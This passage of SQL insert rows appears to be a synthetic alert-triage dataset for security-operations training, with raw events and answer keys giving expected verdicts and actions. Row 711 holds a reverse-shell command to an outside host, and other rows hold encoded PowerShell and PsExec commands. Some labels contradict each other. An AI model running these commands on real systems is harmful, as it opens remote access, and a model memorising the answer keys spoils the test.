(698, 'False Positive: Legitimate User Activity Mistaken for Command Injection', 'low', 'IDS', 'An alert was triggered for a suspected command injection, but the activity was identified as a legitimate administrative task.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T05:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"ping -c 4 8.8.8.8 && echo test\",\"url\":\"http://192.168.2.20/admin/execute\"}', '2026-01-10 23:39:43', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of internal admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Web server internal IP\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"ping -c 4 8.8.8.8 && echo test\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate administrative command executed\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Upon review, the command was identified as a routine administrative task, not malicious.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(699, 'Suspicious PowerShell Execution with Encoded Commands', 'high', 'CrowdStrike', 'A PowerShell process was detected executing with encoded commands on an internal host. This is frequently used in obfuscation techniques by attackers.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"file_hash\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\"}', '2026-01-10 01:55:09', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in malicious scripts.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This hash is associated with potentially unwanted software.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands indicate potential malware execution.\"}', 'Advanced', 'EDR', 7, 1, 'TECH'),
(700, 'Unauthorized Access Attempt via RDP', 'critical', 'Splunk', 'Multiple failed RDP login attempts detected from an external IP address, suggesting a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":25}', '2026-01-10 08:37:56', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'),
(701, 'Suspicious Network Activity Detected', 'medium', 'Firewall', 'A large volume of data was transferred from an internal server to an unknown external IP, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.75\",\"bytes_transferred\":10485760,\"hostname\":\"FILE-SERVER\"}', '2026-01-11 09:55:46', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data transfer patterns suggest possible data exfiltration to a known malicious IP.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'),
(702, 'False Positive: Legitimate Script Execution Detected', 'low', 'Wazuh', 'A legitimate administrative script was detected using mshta.exe, which can sometimes be misidentified as malicious.', 'Lateral Movement', 'T1218.005', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-SERVER\",\"command_line\":\"mshta.exe http://internal.domain.com/admin_script.hta\"}', '2026-01-10 21:43:29', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta.exe http://internal.domain.com/admin_script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is a trusted internal domain for administrative purposes.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The script execution was legitimate, originating from a trusted internal source.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(703, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon associated with LockBit 3.0 ransomware campaign was detected communicating with a known malicious IP. The beacon exhibited process hollowing tactics.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"176.32.98.45\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-WS01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\temp.dll,EntryPoint\",\"file_hash\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"domain\":\"malicious-domain.com\"}', '2026-01-10 14:55:24', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"176.32.98.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1003 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as LockBit 3.0 ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious hash and IP, along with Cobalt Strike beacon activity, confirms the attack.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(704, 'Suspicious Network Traffic to Fast-Flux DNS Domain', 'high', 'Firewall', 'Network traffic to a domain exhibiting fast-flux characteristics was detected. The domain is known to be associated with the BlackCat/ALPHV ransomware group.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.120\",\"domain\":\"fluxy-malicious.com\"}', '2026-01-10 21:54:13', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"fluxy-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux and BlackCat C2 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected client\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The fast-flux domain and known association with ransomware C2 activity confirm the threat.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'),
(705, 'False Positive: Suspected Phishing from Internal Domain', 'medium', 'Proofpoint', 'An email flagged as phishing due to a similar domain name was found to be sent from a legitimate internal source. The email appeared suspicious due to its subject line and formatting.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"email_sender\":\"alerts@internal-domain.com\",\"subject\":\"Urgent: Update Your Password Immediately\",\"url\":\"https://internal-domain.com/security-update\"}', '2026-01-10 05:58:44', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@internal-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate email from internal domain\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://internal-domain.com/security-update\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified internal URL\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a legitimate internal source and was incorrectly flagged due to its subject and formatting.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(706, 'APT Lateral Movement via PsExec Detected', 'high', 'Wazuh', 'An APT actor was detected using PsExec for lateral movement within the network, targeting several internal hosts over SMB.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:30:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\"}', '2026-01-11 08:30:21', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP address of the initiating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP address of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected, often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PsExec for lateral movement is a known tactic of APT groups, confirming the suspicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(707, 'Brute Force Login Attempt Detected', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address. The source is from a foreign location.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-09 17:39:12', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and the source IP\'s malicious history confirm this as a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'TECH'),
(708, 'Malware Detected on Endpoint', 'critical', 'CrowdStrike', 'A known malware signature was detected on an endpoint. The malware has a high detection rate on VirusTotal.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\malicious\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 06:01:10', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60/70 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"CrowdStrike\",\"verdict\":\"malicious\",\"details\":\"Confirmed execution of known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is widely recognized as malicious, indicating a confirmed malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(709, 'Phishing Email with Malicious Link Detected', 'medium', 'Proofpoint', 'A phishing email was detected with a link leading to a known malicious site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"email_sender\":\"phisher@malicious.com\",\"url\":\"http://malicious-site.com/fake-login\",\"username\":\"jdoe\",\"hostname\":\"user-laptop-03\"}', '2026-01-10 16:11:58', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Proofpoint\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign sender\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/fake-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site hosting phishing login page\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing sites\"}}],\"expected_actions\":[\"block_url\",\"close_alert\",\"user_education\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(710, 'Suspicious Network Activity Detected', 'low', 'Firewall', 'An unusual spike in outbound traffic was detected from an internal server, but no malicious activity was confirmed.', 'Data Exfiltration', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"internal-server-01\",\"bytes_sent\":5000000}', '2026-01-09 23:38:05', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in benign traffic, no confirmed malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Traffic was determined to be a legitimate data transfer after further analysis.\"}', 'Novice', 'NDR', 1, 1, 'TECH'),
(711, 'APT41 Command Injection Detected', 'high', 'Wazuh', 'A command injection attempt was identified on a web server. The attacker executed a shell command which could allow them to gain unauthorized access to the system.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"webadmin\",\"hostname\":\"web-server-01\",\"command_line\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\"}', '2026-01-09 18:42:52', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection attempt with a known malicious IP confirms the alert as true positive.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'),
(712, 'Spear-Phishing Attempt by APT29', 'medium', 'Proofpoint', 'A spear-phishing email was detected targeting the finance department. It included a link to a credential harvesting site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"username\":\"j.doe@company.com\",\"hostname\":\"mail-server-01\",\"email_sender\":\"finance@trusted-source.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-10 20:11:25', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance@trusted-source.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL classified as phishing site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and suspicious sender email confirm the phishing attempt, marking it as true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(713, 'Failed Login Attempts from Unusual Location', 'low', 'Splunk', 'Multiple failed login attempts detected for user \'admin\' from a foreign IP address indicating potential brute force attack.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:59Z\",\"event_type\":\"login_failure\",\"src_ip\":\"212.47.229.1\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server-01\",\"failed_attempts\":15}', '2026-01-09 22:20:35', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"212.47.229.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Standard admin account for internal systems\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts from a suspicious IP suggest a brute force attack, making it a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(714, 'Suspicious Network Activity Detected (False Positive)', 'medium', 'Firewall', 'Unusual network traffic was detected from an internal IP to an external cloud service. Further investigation reveals this as legitimate user activity.', 'Network Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"52.34.67.89\",\"username\":\"m.smith\",\"hostname\":\"user-pc-02\",\"domain\":\"cloud-storage.com\"}', '2026-01-10 13:30:15', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"cloud-storage.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate cloud storage service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic was confirmed to be legitimate access to a known cloud service by an authorized user, hence a false positive.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'),
(715, 'Malicious File Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on the host, potentially linked to APT41 activity. The process resembles known malware used for data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host-001\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"file_hash\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\"}', '2026-01-11 07:59:37', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicative of malicious activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command and the file hash are linked to known APT41 malware, indicating a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(716, 'Suspicious Login Attempt Detected from Foreign IP', 'medium', 'SIEM', 'Multiple failed login attempts detected from a suspicious IP address. This could indicate a brute force attack targeting user credentials.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"host-002\",\"failed_attempts\":15}', '2026-01-10 14:22:49', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The multiple failed login attempts from a known malicious IP address confirm a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(717, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received with a URL designed to harvest credentials. The email mimics a trusted service to lure the user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.20\",\"email_sender\":\"no-reply@trustedservice.com\",\"username\":\"mjane\",\"hostname\":\"host-003\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-09 19:07:59', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@trustedservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email appears to mimic a trusted domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL is flagged as a credential harvesting 